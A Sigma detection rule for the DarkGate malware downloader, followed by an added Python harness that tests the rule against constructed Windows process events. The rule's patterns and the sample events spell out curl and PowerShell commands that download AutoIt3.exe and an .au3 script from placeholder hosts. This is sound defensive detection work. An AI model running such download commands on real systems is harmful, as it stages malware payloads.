DarkGate
DarkGate Downloader
Sigma rule
title: DarkGate
status: experimental
description: DarkGate Downloader
author: Joe Security
date: 2023-09-21
id: 200112
threatname:
behaviorgroup: 20
classification: 4
mitreattack:

logsource:
  category: process_creation
  product: windows
detection:
  selection:
    CommandLine:
      - '*copy c:\windows\system32\curl.exe *user-agent: curl* -o autoit3.exe*'
      - '*curl -o autoit3.exe http* & curl -o *.au3 http*'
      - "*Invoke-WebRequest -Uri *-OutFile 'AutoIt3.exe' *Invoke-WebRequest -Uri *-OutFile '*.au3'*"

  condition: selection
level: critical
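To see what the rule above actually flags, here is an added Python example (not part of this page or of Joe Security's tooling) that applies its three CommandLine patterns with Sigma's case-insensitive wildcard semantics to constructed process-creation events; the hosts and paths in the samples are placeholders, not indicators from the page.

```python
import fnmatch

# The three CommandLine patterns of the rule, copied verbatim.
DARKGATE_COMMANDLINE_PATTERNS = [
    r"*copy c:\windows\system32\curl.exe *user-agent: curl* -o autoit3.exe*",
    r"*curl -o autoit3.exe http* & curl -o *.au3 http*",
    r"*Invoke-WebRequest -Uri *-OutFile 'AutoIt3.exe' *Invoke-WebRequest -Uri *-OutFile '*.au3'*",
]


def sigma_match(value: str, pattern: str) -> bool:
    """Sigma string semantics: case-insensitive, '*' = any run, '?' = one char.
    Both sides are lowercased and fnmatchcase is used so the result does not
    depend on the host OS; backslashes in the pattern stay literal, which the
    rule's Windows paths need."""
    return fnmatch.fnmatchcase(value.lower(), pattern.lower())


def evaluate(event: dict) -> list:
    """Apply the rule to one event and return the patterns hit (empty = no alert).
    The logsource check mirrors category/product; 'condition: selection' is met
    when any one CommandLine pattern matches."""
    if event.get("category") != "process_creation" or event.get("product") != "windows":
        return []
    cmd = event.get("CommandLine", "")
    return [p for p in DARKGATE_COMMANDLINE_PATTERNS if sigma_match(cmd, p)]


def _event(cmd: str) -> dict:
    return {"category": "process_creation", "product": "windows", "CommandLine": cmd}


# Constructed sample events (hypothetical command lines with placeholder hosts).
SAMPLE_EVENTS = [
    _event(r'cmd.exe /c copy c:\windows\system32\curl.exe c:\temp\c.exe & c:\temp\c.exe'
           r' -H "user-agent: curl" http://example.invalid/a -o autoit3.exe'),
    _event("cmd /c curl -o autoit3.exe http://example.invalid/a & curl -o script.au3 http://example.invalid/b"),
    _event("powershell -c \"Invoke-WebRequest -Uri http://example.invalid/a -OutFile 'AutoIt3.exe' ;"
           " Invoke-WebRequest -Uri http://example.invalid/b -OutFile 'script.au3'\""),
    _event("curl -o report.pdf https://example.invalid/report.pdf"),  # ordinary curl use, no alert
]

if __name__ == "__main__":
    for ev in SAMPLE_EVENTS:
        print("ALERT" if evaluate(ev) else "ok   ", ev["CommandLine"][:70])
```

Each of the first three samples hits exactly one pattern, which shows that the rule keys on the pairing of a curl/Invoke-WebRequest download with the AutoIt3 executable and an .au3 script rather than on curl alone.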